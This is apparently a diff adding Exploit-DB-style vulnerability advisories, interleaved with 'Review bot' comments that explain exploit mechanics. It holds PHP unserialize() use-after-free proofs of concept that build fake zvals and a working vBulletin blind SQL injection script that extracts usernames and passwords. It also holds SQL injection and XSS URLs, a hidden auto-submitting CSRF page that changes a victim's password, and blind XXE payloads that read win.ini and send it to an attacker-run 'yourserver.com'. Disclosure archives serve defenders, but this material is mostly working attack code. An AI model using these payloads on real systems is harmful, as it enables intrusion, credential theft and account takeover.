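+<?php
+class obj {
+var $ryat;
+function __wakeup() {
+$this->ryat = 1;
+}
+}
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+$inner = 'i:1234;:i:1;';
+$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
+$data = unserialize($exploit);
+var_dump($data);
+function ptr2str($ptr)
+{
+$out = '';
+for ($i = 0; $i < 8; $i++) {
+$out .= chr($ptr & 0xff);
+$ptr >>= 8;
+}
+return $out;
+}
+?>
+Test the PoC on the command line:
+$ php uafpoc.php
+array(5) {
+[0]=>
+int(1)
+[1]=>
+&int(1)
+[2]=>
+object(obj)#2 (1) {
+["ryat"]=>
+&int(1)
+}
+[3]=>
+array(1) {
+[0]=>
+int(1122334455) <=== so we can control the memory and create fake ZVAL :)
+}
+[4]=>
+string(24) "?v?B????"
+}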
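Review bot: The `$fakezval` assembled with `ptr2str()` is a 24-byte buffer (8-byte value, 8 zero bytes, 4-byte refcount, a type byte of `\x01`, an is_ref byte and 2 bytes of padding), i.e. a 64-bit PHP 5 zval, and the `string(24)` in the dump is that same buffer; the advisory should say the PoC is 64-bit-only and that the `s:24:"…"` element at index 4 is what reoccupies the freed slot that `R:5` points at. It would also help readers to spell out the trigger: `R:3` binds `obj::$ryat` to the `SplDoublyLinkedList` at index 1, so the `$this->ryat = 1` in `__wakeup()` writes through the reference and destroys the list (the dump shows `[1]=> &int(1)`), freeing the `i:1` element pushed by the quoted `spl_ptr_llist_push()` loop while it is still registered for `R:` lookups. A closing line such as `Fixed in PHP 5.6.13 / 5.5.29 / 5.4.45` would make the remediation explicit rather than implied by the `<` bounds.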

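--- a/platforms/php/dos/38121.txt
+++ b/platforms/php/dos/38121.txt
@@ -0,0 +1,104 @@
+Use After Free Vulnerability in unserialize() with GMP
+Taoguang Chen <[@chtg](http://github.com/chtg)>
+Write Date: 2015.8.17
+Release Date: 2015.9.4
+A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+Description
+------------
+static int gmp_unserialize(zval **object, zend_class_entry *ce, const
+unsigned char *buf, zend_uint buf_len, zend_unserialize_data *data
+TSRMLS_DC) /* {{{ */
+{
+...
+INIT_ZVAL(zv);
+if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC)
+|| Z_TYPE_P(zv_ptr) != IS_STRING
+|| convert_to_gmp(gmpnum, zv_ptr, 10 TSRMLS_CC) == FAILURE
+) {
+zend_throw_exception(NULL, "Could not unserialize number", 0 TSRMLS_CC);
+goto exit;
+}
+zval_dtor(&zv);
+INIT_ZVAL(zv);
+if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC)
+|| Z_TYPE_P(zv_ptr) != IS_ARRAY
+) {
+zend_throw_exception(NULL, "Could not unserialize properties", 0 TSRMLS_CC);
+goto exit;
+}
+The GMP object's deserialization can create ZVAL and free its
+zval_value from memory via zval_dtor(). However during deserialization
+will still allow to use R: or r: to set references to that already
+freed memory. It is possible to use-after-free attack and execute
+arbitrary code remotely.
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
+<?php
+$inner = 'r:2;a:1:{i:0;a:1:{i:0;r:4;}}';
+$exploit = 'a:2:{i:0;s:1:"1";i:1;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
+$data = unserialize($exploit);
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+for ($i = 0; $i < 5; $i++) {
+$v[$i] = $fakezval.$i;
+}
+var_dump($data);
+function ptr2str($ptr)
+{
+$out = '';
+for ($i = 0; $i < 8; $i++) {
+$out .= chr($ptr & 0xff);
+$ptr >>= 8;
+}
+return $out;
+}
+?>
+Test the PoC on the command line:
+$ php uafpoc.php
+array(2) {
+[0]=>
+int(1122334455) <=== so we can control the memory and create fake ZVAL :)
+[1]=>
+object(GMP)#1 (2) {
+[0]=>
+array(1) {
+[0]=>
+int(4325299791)
+}
+["num"]=>
+string(1) "1"
+}
+}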
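Review bot: Unlike the SplDoublyLinkedList PoC, the fake zvals here are allocated after `unserialize()` has returned (`$v[$i] = $fakezval.$i` in the loop), so the dangling `r:2`/`r:4` references are only dereferenced when `var_dump($data)` runs; the PoC text should say that the read happens at dump time and that success depends on the allocator handing the freed chunk to one of those five strings, otherwise readers will expect `unserialize()` itself to crash. The quoted `gmp_unserialize()` excerpt stops before `exit:`, so the claim that the stack zval `zv` is released by `zval_dtor(&zv)` while `zv_ptr` remains registered in `unserialize_data` is presumably right but cannot be checked from the excerpt — a sentence naming where the pointer stays live would close that gap. Listing only 5.6 under `Affected Versions` is presumably because GMP objects (and hence their serialization) first appeared in 5.6; stating that avoids the impression that 5.4/5.5 were simply not tested. As in the sibling advisories, `ptr2str()` emits 8-byte values, so the layout is 64-bit-specific.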

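--- a/platforms/php/dos/38122.txt
+++ b/platforms/php/dos/38122.txt
@@ -0,0 +1,106 @@
+Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage
+Taoguang Chen <[@chtg](http://github.com/chtg)>
+Write Date: 2015.8.27
+Release Date: 2015.9.4
+A use-after-free vulnerability was discovered in unserialize() with SplObjectStorage object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Affected is PHP 5.5 < 5.5.29
+Affected is PHP 5.4 < 5.4.45
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+Description
+------------
+ALLOC_INIT_ZVAL(pentry);
+if (!php_var_unserialize(&pentry, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+zval_ptr_dtor(&pentry);
+goto outexcept;
+}
+if(Z_TYPE_P(pentry) != IS_OBJECT) {
+goto outexcept;
+}
+ALLOC_INIT_ZVAL(pinf);
+if (*p == ',') { /* new version has inf */
+++p;
+if (!php_var_unserialize(&pinf, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+zval_ptr_dtor(&pinf);
+goto outexcept;
+}
+}
+It has been demonstrated many times before that __wakeup() leads to
+ZVAL is freed from memory. However during deserialization will still
+allow to use R: or r: to set references to that already freed memory.
+It is possible to use-after-free attack and execute arbitrary code
+remotely.
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
+<?php
+class obj {
+var $ryat;
+function __wakeup() {
+$this->ryat = 1;
+}
+}
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+$inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}';
+$exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
+$data = unserialize($exploit);
+var_dump($data);
+function ptr2str($ptr)
+{
+$out = '';
+for ($i = 0; $i < 8; $i++) {
+$out .= chr($ptr & 0xff);
+$ptr >>= 8;
+}
+return $out;
+}
+?>
+Test the PoC on the command line:
+$ php uafpoc.php
+array(5) {
+[0]=>
+int(1)
+[1]=>
+&int(1)
+[2]=>
+object(obj)#3 (1) {
+["ryat"]=>
+&int(1)
+}
+[3]=>
+int(1122334455) <=== so we can control the memory and create fake ZVAL :)
+[4]=>
+string(24) "?v?B????"
+}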
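Review bot: In the quoted SplObjectStorage excerpt, the `if(Z_TYPE_P(pentry) != IS_OBJECT) { goto outexcept; }` path leaves `pentry` allocated, whereas the failure branch just above it calls `zval_ptr_dtor(&pentry)` first; unless `outexcept` releases it (the label is outside the excerpt), that is a separate leak on the non-object path and worth one sentence so readers studying this code do not conflate it with the use-after-free being reported. The PoC's inner string `x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}` deliberately takes the `*p == ','` inf branch so that a second zval (`i:1`) is registered in `var_hash` before `__wakeup()` destroys the storage via the `R:3` reference (`[1]=> &int(1)` in the dump); presumably that inf zval is the slot `R:6` resolves to, and saying so would explain the index choice. `ptr2str()` again emits 8-byte values, so the 24-byte fake zval and the `string(24)` dump are the 64-bit layout.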

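--- a/platforms/php/dos/38123.txt
+++ b/platforms/php/dos/38123.txt
@@ -0,0 +1,125 @@
+Use After Free Vulnerabilities in Session Deserializer
+Taoguang Chen <[@chtg](http://github.com/chtg)>
+Write Date: 2015.8.9
+Release Date: 2015.9.4
+Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_serialize) that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Affected is PHP 5.5 < 5.5.29
+Affected is PHP 5.4 < 5.4.45
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+Description
+------------
+PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
+{
+...
+PHP_VAR_UNSERIALIZE_INIT(var_hash);
+p = val;
+while (p < endptr) {
+...
+if (has_value) {
+ALLOC_INIT_ZVAL(current);
+if (php_var_unserialize(&current, (const unsigned char **) &q,
+(const unsigned char *) endptr, &var_hash TSRMLS_CC)) {
+php_set_session_var(name, namelen, current, &var_hash TSRMLS_CC);
+}
+zval_ptr_dtor(&current);
+}
+PS_ADD_VARL(name, namelen);
+skip:
+efree(name);
+p = q;
+}
+break_outer_loop:
+PHP_VAR_UNSERIALIZE_DESTROY(var_hash);
+return SUCCESS;
+}
+When session deserializer (php/php_binary) deserializing multiple data
+it will call to php_var_unserialize() multiple times. So we can create
+ZVAL and free it via the php_var_unserialize() with a crafted
+serialized string, and also free the memory (reduce the reference
+count of the ZVAL to zero) via zval_ptr_dtor() with deserialize two
+identical session data, then the next call to php_var_unserialize()
+will still allow to use R: or r: to set references to that already
+freed memory. It is possible to use-after-free attack and execute
+arbitrary code remotely.
+In some other cases, session deserializer
+(php/php_binary/php_serialize) may also lead to use-after-free
+vulnerabilities: i) via crafted Serializable::unserialize() ii) via
+unserialize()'s callback function and zend_lookup_class() call a
+crafted __autoload().
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.4.44.
+<?php
+session_start();
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+$exploit = 'ryat|a:2:{i:0;i:1;i:1;a:1:{i:1;chtg|a:1:{i:0;R:4;}';
+// $exploit = 'ryat|a:1:{i:0;i:1;}ryat|i:1;chtg|R:1;';
+session_decode($exploit);
+for ($i = 0; $i < 5; $i++) {
+$v[$i] = $fakezval.$i;
+}
+var_dump($_SESSION);
+function ptr2str($ptr)
+{
+$out = "";
+for ($i = 0; $i < 8; $i++) {
+$out .= chr($ptr & 0xff);
+$ptr >>= 8;
+}
+return $out;
+}
+?>
+Test the PoC on the command line:
+$ php uafpoc.php
+array(2) {
+["ryat"]=>
+NULL
+["chtg"]=>
+array(1) {
+[0]=>
+int(1122334455) <=== so we can control the memory and create fake ZVAL :)
+}
+}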
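Review bot: The first record in `$exploit`, `ryat|a:2:{i:0;i:1;i:1;a:1:{i:1;`, is deliberately malformed — the inner array is never closed — so `php_var_unserialize()` fails, `php_set_session_var()` is skipped and the `zval_ptr_dtor(&current)` in the quoted loop releases what was built so far while its nested slots presumably stay registered in `var_hash`, which is why the dump shows `["ryat"]=> NULL` and `chtg`'s `R:4` reads reused memory; the PoC should state this, because a reader who "fixes" the truncated string loses the bug. The commented-out alternative `ryat|a:1:{i:0;i:1;}ryat|i:1;chtg|R:1;` is the duplicate-variable-name case the text describes and deserves a one-line label saying so. The exploitation precondition is also worth stating up front: attacker-controlled bytes must reach `session_decode()` or the session read handler, as the PoC's `session_start()` + `session_decode($exploit)` arranges, and the fake zvals are sprayed only after decoding, so the read is exercised by `var_dump($_SESSION)`.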

platforms/php/dos/38125.txt Executable file

@ -0,0 +1,179 @@
Use After Free Vulnerabilities in unserialize()
Taoguang Chen <[@chtg](http://github.com/chtg)>
Write Date: 2015.7.31
Release Date: 2015.9.4
Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.12
Affected is PHP 5.5 < 5.5.28
Affected is PHP 5.4 < 5.4.44
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
if (ce->unserialize == NULL) {
zend_error(E_WARNING, "Class %s has no unserializer", ZSTR_VAL(ce->name));
object_init_ex(rval, ce);
} else if (ce->unserialize(rval, ce, (const unsigned char*)*p,
datalen, (zend_unserialize_data *)var_hash) != SUCCESS) {
return 0;
}
(*p) += datalen;
return finish_nested_data(UNSERIALIZE_PASSTHRU);
The unserialize() with Serializable class lead to various problems.
i) Free the memory via crafted Serializable class
<?php
class obj implements Serializable {
var $data;
function serialize() {
return serialize($this->data);
}
function unserialize($data) {
$this->data = unserialize($data);
$this->data = 1;
}
}
?>
ii) Free the memory via the process_nested_data() with a invalid
serialized string
static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable
*ht, long elements, int objprops)
{
while (elements-- > 0) {
zval *key, *data, **old_data;
...
ALLOC_INIT_ZVAL(data);
if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) {
zval_dtor(key);
FREE_ZVAL(key);
zval_dtor(data);
FREE_ZVAL(data); <=== free the memory
return 0;
}
iii) Free the memory via the var_push_dtor_no_addref() with the var_destroy().
PHPAPI void var_destroy(php_unserialize_data_t *var_hashx)
{
...
while (var_hash) {
for (i = 0; i < var_hash->used_slots; i++) {
zval_ptr_dtor(&var_hash->data[i]); <=== free the memory
}
...
PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER)
{
...
if (*rval != NULL) {
var_push_dtor_no_addref(var_hash, rval);
}
*rval = *rval_ref;
We can create ZVAL and free it via Serializable::unserialize. However
the unserialize() will still allow to use R: or r: to set references
to that already freed memory. It is possible to use-after-free attack
and execute arbitrary code remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43.
<?php
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
// i)
//$inner = 'a:1:{i:0;i:1;}';
//$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
// ii)
$inner = 'a:2:{i:0;i:1;i:1;i:2';
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}';
// iii)
//$inner = 'r:1;';
//$exploit = 'a:1:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = $fakezval.$i;
}
var_dump($data);
function ptr2str($ptr)
{
$out = "";
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
class obj implements Serializable {
var $data;
function serialize() {
return serialize($this->data);
}
function unserialize($data) {
$this->data = unserialize($data);
// i)
// $this->data = '1';
}
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(2) {
[0]=>
object(obj)#1 (1) {
["data"]=>
bool(false)
}
[1]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}
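Review bot: The advisory states affected versions but carries no solution or mitigation line, so a reader has to infer the fixed releases from the `<` bounds under "Affected Versions". I would add a short section after "Credits" along the lines of `Solution` / `------------` / `Upgrade to PHP 5.6.12, 5.5.28 or 5.4.44 or later.`, which are exactly the upper bounds the advisory itself gives. The source quoted under "Description" also appears to be from a PHP 7 tree (it uses the ZSTR_VAL() accessor) while the affected branches are all 5.x, so it would help to state which branch the snippet was taken from.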

23
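--- a/platforms/php/webapps/38111.txt
+++ b/platforms/php/webapps/38111.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/56860/info
+The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
+Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+Simple Gmail Login 1.1.3 and prior are vulnerable.
+Fatal error: Uncaught exception 'Exception' with message
+'DateTimeZone::__construct() [<a
+href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
+Stack trace: #0
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229):
+DateTimeZone->__construct('') #1
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210):
+SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
+function]: SimpleGmail_Plugin->activate('') #3
+C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403):
+call_user_func_array(Array, Array) #4
+C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157):
+do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
+on line 229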


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56862/info
FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20

86
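--- a/platforms/php/webapps/38113.php
+++ b/platforms/php/webapps/38113.php
@@ -0,0 +1,86 @@
+source: http://www.securityfocus.com/bid/56877/info
+The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+#!/usr/bin/php
+<?
+# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
+# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
+# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
+# check it : http://www.example.com/vBulletin/clientscript/register.js
+function usage ()
+{
+echo
+"\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
+"\n[+] Author: Cold z3ro".
+"\n[+] Site : http://www.example.com | www.example.com".
+"\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
+"\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
+"\n[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
+"\n[+] Note. : Its a 0day exploit\n\n";
+exit ();
+}
+function check ($hostname, $path, $field, $pos, $usid, $char)
+{
+$char = ord ($char);
+$inj = 'ajax.php?do=CheckUsername&param=';
+$inj.=
+"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
+$culr = $hostname.$path.$inj;
+$curl = curl_init();
+curl_setopt ($curl, CURLOPT_URL, $culr );
+curl_setopt($curl, CURLOPT_HEADER, 1);
+curl_setopt($curl, CURLOPT_VERBOSE, 0);
+ob_start();
+curl_exec ($curl);
+curl_close ($curl);
+$con = ob_get_contents();
+ob_end_clean();
+if(eregi('Invalid',$con))
+return true;
+else
+return false;
+}
+function brutechar ($hostname, $path, $field, $usid, $key)
+{
+$pos = 1;
+$chr = 0;
+while ($chr < strlen ($key))
+{
+if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
+{
+echo $key [$chr];
+$chr = -1;
+$pos++;
+}
+$chr++;
+}
+}
+if (count ($argv) != 4)
+usage ();
+$hostname = $argv [1];
+$path = $argv [2];
+$usid = $argv [3];
+$key = $argv [4];
+if (empty ($key))
+$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+echo "[+] Username: ";
+brutechar ($hostname, $path, "username", $usid, $key);
+echo "\n[+] Password: ";
+brutechar ($hostname, $path, "password", $usid, $key);
+echo "\n[+] Done..";
+echo "\n[+] It's not fake, its real.";
+# word to 1337day.com, stop scaming me
+?>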
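Review bot: The script's header does not state the PHP version it was written for, and the `eregi('Invalid',$con)` test in check() relies on a function deprecated since PHP 5.3 and absent from PHP 7, so the archived copy will not run unmodified on current interpreters. I would add a line to the header comment block, e.g. `# Requires PHP 5.x: uses eregi(), removed in PHP 7`. The usage text is also internally inconsistent with the argument handling: it documents `[userid] [key]` as optional and shows a five-argument example, while `if (count ($argv) != 4)` accepts only exactly four entries; the two should be reconciled in the documentation so the usage message matches what the script actually checks.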


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56882/info
Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E


@ -0,0 +1,60 @@
<!--
# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.auto-exchanger.com]
# Version: [Version 5.1.0]
# Demo : www.farhadexchange.com
# CVE : [CVE-2015-6827]
------------------------------------
details:
------------------------------------
auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker
is able to abuse of this vulnerability to change password by a hidden
iframe in another page.
-------------------------------------
Exploit:
-------------------------------------
-->
<html>
<body>
<iframe style="display:none" name="xsrf-frame"></iframe>
<form method='POST' action='http://farhadexchange.com/signup.php'
target="xsrf-frame" id="xsrf-form">
<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
<INPUT type="hidden" name="suser" value="victim_user">
<input type="hidden" name="section" value="do_update" />
<label type='hidden' id="n_password0"><span>
<input type='hidden' maxlength="20" size="30" name="password0"
id="password0" value="testpassword123456" > </label>
<input type="hidden" name="rid" value="" />
<label id="n_password">
<input type="hidden" maxlength="20" size="30" name="password1"
id="password1" value="testpassword123456" ></label>
<label id="n_mail">
<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
value="victim_email" type="text">
</label>
<label id="n_country">
<input type='hidden' name="country" id="country" style="width:196;"
value="IR">
</label>
<label id="cid">
<input type='hidden' name='cid' value='2'/>
</label>
<label id="n_curreny_account">
<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
id="curreny_account" value="" ><br>
</label>
</form>
<script>document.getElementById("xsrf-form").submit()</script>
</body>
</html>

99
platforms/xml/webapps/38118.txt Executable file

@ -0,0 +1,99 @@
Exploit Title: Qlikview blind XXE security vulnerability
Product: Qlikview
Vulnerable Versions: v11.20 SR11 and previous versions
Tested Version: v11.20 SR4
Advisory Publication: 08/09/2015
Latest Update: 08/09/2015
Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
CVE Reference: CVE-2015-3623
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: QLIK
Product & Version:
QlikView v11.20 SR4
Vendor URL & Download:
http://www.qlik.com/us/explore/products/qlikview
Product Description:
"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
(2) Vulnerability Details:
--------------------------
The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly.
Proof of concept for XXE [CVE-2015-5361]:
-----------------------------------------
URL: https://<QLIKVIEW>/AccessPoint.aspx
Attack Pattern for SSRF:
------------------------
In POST body:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>
OR simply
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
Attack Pattern for reading and extracting arbitrary files:
------------------------------------------
In POST body:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]]>
The test.dtd file on yourserver.com will need to contain the following:
Test.dtd
--------
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://yourserver.com/?%remote;'>">
%all;
As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
(3) Advisory Timeline:
----------------------
29/04/2015 - First Contact informing vendor of vulnerability
30/04/2015 - Response requesting details of vulnerability. Details sent
05/05/2015 - Vendor indicates issue is under investigation.
06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
08/09/2015 - Public disclosure of vulnerability.
(4)Solution:
------------
Upgrade to QV11.20 SR12 will correct the vulnerability.
(5) Credits:
------------
Discovered by Alex Haynes
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
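Review bot: The advisory cites two different CVE identifiers for the same issue: the header line "CVE Reference: CVE-2015-3623" and both References agree on CVE-2015-3623, but the proof-of-concept heading reads "Proof of concept for XXE [CVE-2015-5361]:". One of them is presumably a typo, and the PoC heading should be brought in line with the header, e.g. `Proof of concept for XXE [CVE-2015-3623]:`, or the second identifier explained if it is intentional. The section's declared length is 99 lines and only the non-blank lines are visible here, so there may be trailing content past this point.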